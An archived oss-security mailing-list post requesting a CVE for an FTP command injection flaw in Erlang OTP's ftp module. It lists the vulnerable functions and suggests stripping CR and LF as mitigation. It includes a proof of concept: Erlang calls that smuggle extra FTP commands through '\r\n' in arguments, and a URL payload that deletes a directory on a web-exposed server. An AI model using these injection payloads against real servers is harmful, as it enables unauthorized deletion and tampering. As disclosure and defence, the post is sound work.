Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <CAM4=iJ2tXAuMETRMLqJAyKbzYTY7R3iN_P9o6DxCUCr+HXdDLA@mail.gmail.com>
Date: Tue, 28 Jan 2014 22:48:41 +0100
From: Seba <argos83@...il.com>
To: cve-assign@...re.org, oss-security@...ts.openwall.com
Subject: CVE Request: Erlang OTP - ftp module - FTP Command Injection

Hi,

This has been reported to erlang-bugs mailing list:
http://erlang.org/pipermail/erlang-bugs/2014-January/003998.html

There is an FTP Command Injection vulnerability in the "ftp" module.

All those functions that write any string argument in the control
socket seem to be vulnerable:

user/3
user/4
account/2
cd/2
ls/2
nlist/2
rename/3
delete/2
mkdir/2
rmdir/2
recv/2
recv/3
recv_bin/2,
recv_chunk_start/2
send/3
send_bin/3
send_chunk_start/2
append_chunk_start/2
append/2
append/3
append_bin/3

Vulnerability Description
-------------------------

By injecting a \r\n sequence followed by a new command in a function
argument you get the ftp module to write the whole string in the
socket.

E.g. the following erlang shell session:

1> inets:start().
ok
2> {ok, Pid} = inets:start(ftpc, [{host, "127.0.0.1"}]).
{ok,<0.46.0>}
3> ftp:user(Pid, "anonymous", "password\r\nCWD pub\r\nMKD new_dir").
ok
4> ftp:cd(Pid, "/pub\r\nRMD new_dir\r\nPASV").
ok


Generates the following FTP session:

FTP command: Client "127.0.0.1", "USER anonymous"
FTP response: Client "127.0.0.1", "331 Please specify the password."
FTP command: Client "127.0.0.1", "PASS <password>"
FTP response: Client "127.0.0.1", "230 Login successful."
FTP command: Client "127.0.0.1", "CWD pub"
FTP response: Client "127.0.0.1", "250 Directory successfully changed."
FTP command: Client "127.0.0.1", "MKD new_dir"
FTP response: Client "127.0.0.1", "257 "/pub/new_dir" created"
FTP command: Client "127.0.0.1", "CWD /pub"
FTP response: Client "127.0.0.1", "250 Directory successfully changed."
FTP command: Client "127.0.0.1", "RMD new_dir"
FTP response: Client "127.0.0.1", "250 Remove directory operation successful."
FTP command: Client "127.0.0.1", "PASV"
FTP response: Client "127.0.0.1", "227 Entering Passive Mode
(127,0,0,1,130,161)."


Attack Scenario Example
-----------------------

A web server allow users to navigate and download documents.
Internally the web server connects to a private ftp server using OTP
"ftp" module.
An attacker might take advantage of the vulnerability to execute
actions that aren't supposed to be exposed. E.g. delete a directory by
requesting:

http://www.example.com/list_dir.yaws?dir=/docs/%0d%0aRMD+/docs

Tested on
---------
 - Erlang OTP: R15B03
 - Ubuntu 12.04 x86_64
 - FTP Sever: vsftpd


Mitigation
----------

Until this is fixed and the proper sanitization is implemented within
the ftp module, string arguments should get "\r" and "\n" removed
before being passed to these functions.


Sebastián Tello

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.